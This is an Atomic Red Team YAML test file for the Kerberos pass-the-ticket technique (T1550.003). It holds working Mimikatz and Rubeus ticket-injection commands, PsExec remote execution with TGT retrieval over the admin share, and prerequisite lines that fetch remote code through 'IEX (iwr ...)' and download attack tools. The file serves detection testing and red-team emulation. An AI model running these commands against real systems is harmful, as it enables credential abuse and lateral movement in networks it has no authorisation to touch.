atomic-red-team/atomics/T1550.003/T1550.003.yaml

attack_technique: T1550.003
display_name: 'Use Alternate Authentication Material: Pass the Ticket'
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
  auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
  description: |
    Similar to PTH, but attacking Kerberos
  supported_platforms:
  - windows
  input_arguments:
    ticket:
      description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module)
      type: string
      default:
    mimikatz_exe:
      description: Path of the Mimikatz binary
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\bin\x64\mimikatz.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Mimikatz must exist on disk at specified location (#{mimikatz_exe})
    prereq_command: |
      if (Test-Path "#{mimikatz_exe}") {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
      $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
      $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
      $basePath = Split-Path "#{mimikatz_exe}" | Split-Path
      Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
  executor:
    command: |
      "#{mimikatz_exe}" "kerberos::ptt #{ticket}"
    name: command_prompt
- name: Rubeus Kerberos Pass The Ticket
  auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb
  description: |
    Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).
    PsExec is used to execute commands on the remote system, and the "C$" admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.
  supported_platforms:
  - windows
  input_arguments:
    target:
      description: Remote system to request the TGT from
      type: string
      default: localhost
    user_name:
      description: username associated with the ticket (privileged account not required)
      type: string
      default: Administrator
    password:
      description: password for user_name
      type: string
      default: Password
    domain:
      description: domain
      type: string
      default: $Env:USERDOMAIN
    rubeus_url:
      description: URL of Rubeus executable
      type: url
      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Rubeus must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-Webrequest -Uri #{rubeus_url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"
  - description: |
      PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
      Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
      New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null
      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
  executor:
    name: powershell
    elevation_required: true
    command: |
      & "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula \\#{target} -w c:\ -c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi
      Set-Location "PathToAtomicsFolder\..\ExternalPayloads"
      Move-Item -Force "\\#{target}\c$\ticket.kirbi" ticket.kirbi
      Write-Host "Successfully retrieved TGT from '#{target}', now requesting a TGS from local"
      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\ticket.kirbi"
      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" purge